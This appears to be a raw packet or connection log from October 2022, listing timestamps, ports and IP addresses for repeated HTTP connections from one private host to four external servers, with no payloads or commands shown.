Oct 26, 2022 13:17:06.164824963 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.164844990 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164897919 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164953947 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164959908 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.165009022 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.165060043 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.165101051 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.165152073 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.165285110 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.167243958 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.167318106 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.167375088 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.167429924 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.167483091 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.167543888 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.167692900 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.168122053 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.168363094 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.173203945 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.173285007 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.173772097 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.185079098 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185169935 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185234070 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185292959 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185345888 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185379028 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.185399055 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185460091 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185512066 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185525894 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.185564995 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.185579062 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.185702085 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.185703039 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.660469055 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.676050901 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.696291924 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.696439028 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.697047949 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.697139025 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.717120886 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717215061 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717339039 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717344999 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.717479944 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.717488050 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717618942 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717633009 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717652082 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.717819929 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.717839003 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717849970 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717966080 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717983961 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.717989922 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.718190908 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.718360901 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.737293959 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737411976 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737423897 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737464905 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.737525940 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737639904 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.737677097 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737689972 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737747908 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737756968 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.737808943 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.737977982 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.737981081 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.738138914 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:07.738142014 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.738219023 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.738228083 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.757313013 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.757458925 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.757580996 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.757705927 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.757831097 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:07.757956028 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.176630974 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.176716089 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.176769018 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.176829100 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.176876068 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.176934958 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.176966906 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.177023888 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.177037001 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.177114010 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.177118063 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.177207947 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.177258968 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.177287102 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.177364111 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.197419882 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197514057 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197581053 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197639942 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197700977 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197736979 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.197805882 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197877884 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.197894096 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197981119 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.197997093 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.198076010 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.198141098 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.198158979 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.198234081 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.198306084 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.198329926 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.198401928 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.198499918 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.200021029 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.200095892 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.200164080 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.200212002 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.200236082 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.200371981 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.200382948 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.200474977 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.200535059 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.200560093 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.200723886 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.218739033 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.218827009 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.218893051 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.218955040 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.219002962 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.219038963 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.219125986 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.219136953 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.219221115 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.219286919 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.219310999 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.219384909 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.219464064 CEST	80	49872	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:08.219469070 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.219641924 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:08.706882954 CEST	49872	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:09.722412109 CEST	49873	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:09.742106915 CEST	80	49873	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:09.742356062 CEST	49873	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:09.742439032 CEST	49873	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:09.799180031 CEST	80	49873	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:10.167467117 CEST	80	49873	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:10.167542934 CEST	80	49873	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:10.167599916 CEST	80	49873	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:10.167951107 CEST	49873	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:10.168081045 CEST	49873	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:10.187685013 CEST	80	49873	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:15.195550919 CEST	49874	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:15.215663910 CEST	80	49874	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:15.216316938 CEST	49874	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:15.216478109 CEST	49874	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:15.229516983 CEST	80	49874	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:15.231239080 CEST	80	49874	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:15.231306076 CEST	80	49874	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:15.231478930 CEST	49874	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:16.220906019 CEST	49874	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:17.236459970 CEST	49875	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:17.248449087 CEST	80	49875	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:17.248675108 CEST	49875	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:17.248756886 CEST	49875	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:17.260698080 CEST	80	49875	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:17.262770891 CEST	80	49875	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:17.262844086 CEST	80	49875	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:17.263062954 CEST	49875	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:18.251713991 CEST	49875	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.267525911 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.279556036 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.279820919 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.280451059 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.280539036 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.292428017 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.292501926 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.292547941 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.292594910 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.292627096 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.292800903 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.292860031 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.292928934 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.292978048 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.293082952 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.293138981 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.293314934 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.294287920 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.304852009 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.304917097 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.305057049 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.305094957 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.305171967 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.305233002 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.305402994 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:19.305458069 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.305636883 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.305807114 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.317089081 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.317303896 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.317373991 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.317742109 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.317784071 CEST	80	49876	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:19.317975998 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:20.282355070 CEST	49876	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.298048019 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.309895992 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.310108900 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.310172081 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.322066069 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324217081 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324382067 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324460030 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324522972 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324584007 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324637890 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324686050 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:21.324726105 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.324726105 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.324887037 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.325109959 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.325221062 CEST	49877	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:17:21.337054968 CEST	80	49877	89.31.143.1	192.168.11.20
Oct 26, 2022 13:17:26.371037960 CEST	49878	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:26.382216930 CEST	80	49878	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:26.382436991 CEST	49878	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:26.382599115 CEST	49878	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:26.393274069 CEST	80	49878	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:26.394283056 CEST	80	49878	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:26.394294024 CEST	80	49878	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:26.394444942 CEST	49878	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:27.391789913 CEST	49878	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:28.405860901 CEST	49879	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:28.417620897 CEST	80	49879	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:28.417851925 CEST	49879	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:28.417936087 CEST	49879	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:28.428994894 CEST	80	49879	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:28.430005074 CEST	80	49879	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:28.430121899 CEST	80	49879	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:28.430291891 CEST	49879	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:29.421019077 CEST	49879	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.436917067 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.448785067 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.448976040 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.449599028 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.449708939 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.460916042 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461000919 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461066961 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461090088 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.461146116 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.461213112 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.461358070 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461386919 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.461426020 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461472034 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.461491108 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461553097 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461663961 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.461719990 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461791039 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.461821079 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.462034941 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.462152958 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.472186089 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.472347975 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.472436905 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.472660065 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.472717047 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.472763062 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.472878933 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.472908974 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.473078012 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.473249912 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.473258972 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.473400116 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.473501921 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.473587990 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:30.473627090 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.474086046 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.474239111 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.483416080 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.483654022 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.484066010 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.484179020 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.484447002 CEST	80	49880	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:30.484694004 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:31.451864004 CEST	49880	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:32.476337910 CEST	49881	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:32.487154961 CEST	80	49881	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:32.487353086 CEST	49881	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:32.487482071 CEST	49881	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:32.497884035 CEST	80	49881	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:32.498060942 CEST	80	49881	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:32.498070955 CEST	80	49881	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:32.498449087 CEST	49881	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:32.498605013 CEST	49881	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:17:32.508867979 CEST	80	49881	3.64.163.50	192.168.11.20
Oct 26, 2022 13:17:37.535558939 CEST	49882	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:37.544428110 CEST	80	49882	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:37.544680119 CEST	49882	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:37.544940948 CEST	49882	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:37.553719044 CEST	80	49882	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:37.750523090 CEST	80	49882	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:37.750691891 CEST	80	49882	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:37.750813961 CEST	80	49882	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:37.750885010 CEST	49882	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:37.750986099 CEST	80	49882	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:37.751184940 CEST	49882	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:38.559618950 CEST	49882	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:39.575247049 CEST	49883	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:39.584286928 CEST	80	49883	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:39.584512949 CEST	49883	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:39.584585905 CEST	49883	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:39.593432903 CEST	80	49883	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:39.794884920 CEST	80	49883	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:39.794959068 CEST	80	49883	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:39.795003891 CEST	80	49883	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:39.795049906 CEST	80	49883	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:39.795186996 CEST	49883	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:39.795187950 CEST	49883	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:40.590595007 CEST	49883	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.606131077 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.615320921 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.615523100 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.616065979 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.616158962 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.624917984 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.624991894 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625058889 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625072956 CEST	49884	80	192.168.11.20	188.114.96.3
